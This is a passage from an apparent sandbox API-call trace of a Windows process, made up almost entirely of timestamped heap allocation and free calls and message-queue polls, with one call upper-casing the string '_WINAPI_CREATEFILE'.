[0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.772] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.773] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.773] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.773] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.773] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0177.774] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0177.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0177.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.774] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0177.774] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0177.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0177.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0177.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0177.774] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0177.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0177.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0177.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.775] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0177.775] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0177.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0177.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0177.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.776] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.776] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0177.777] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0177.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.778] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.778] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0177.779] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0177.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0177.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0177.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0177.781] RtlAllocateHeap 